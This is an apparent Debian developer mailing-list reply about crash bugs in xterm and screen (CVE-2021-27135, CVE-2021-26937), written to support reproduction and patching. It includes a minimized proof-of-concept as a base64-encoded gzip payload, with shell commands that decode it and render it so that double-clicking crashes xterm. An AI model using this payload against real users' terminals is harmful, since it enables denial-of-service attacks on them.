Hi, Utkarsh Gupta wrote: > On Wed, Feb 10, 2021 at 6:56 PM Utkarsh Gupta <utka...@debian.org> wrote: > > I'll take care of fixing stretch and jessie and I am aware of all this > > since I was the one who got this CVE assigned! :D > > Somewhat related, I also got CVE-2021-27135 assigned for xterm. > I'll take care of the updates when the patch is available. > > But interestingly, while reproducing the issue in screen, you can also > easily reproduce this issue in xterm. See[1]. > > [1]: https://www.openwall.com/lists/oss-security/2021/02/09/7
Ick! And indeed, double clicking that line closes xterm. Ouch.
urxvt and kitty seem not affected — but also don't seem to render it
correctly either.
I btw. managed to get Taviso's crash with xterm (365-1 from Debian
Unstable) even shorter.
$ base64 -d < CVE-2021-26937.poc.minimized | gzip -d - > test
$ lynx -dump test | head -1
And the e.g. double clicking on the resulting line.
Compressed and base64 encoded:
H4sICO4NJGACA3Rlc3Qub25lbGluZQB72tb2EIT2P92//2F7H5gxA0hCRdr2gRlzkES2gxkTESLt
C0CMtl1IIu1gxnwkXbvAjM0IkdbNYMZiJF3rwYx2JJFWMGMmkjl7YGqaYeZsAzM2IemCSM1C0rUa
yOACAGPLp0/rAAAA
It though doesn't crash an unpatched screen.
Actually when Tavis mentioned Thomas, I just wanted to test where I
have most contact with Thomas: Lynx. But I found no similar issues in
Lynx. :-)
Regards, Axel
--
,''`. | Axel Beckert <a...@debian.org>, https://people.debian.org/~abe/
: :' : | Debian Developer, ftp.ch.debian.org Admin
`. `' | 4096R: 2517 B724 C5F6 CA99 5329 6E61 2FF9 CD59 6126 16B5
`- | 1024D: F067 EA27 26B9 C3FC 1486 202E C09E 1D89 9593 0EDE
signature.asc
Description: PGP signature
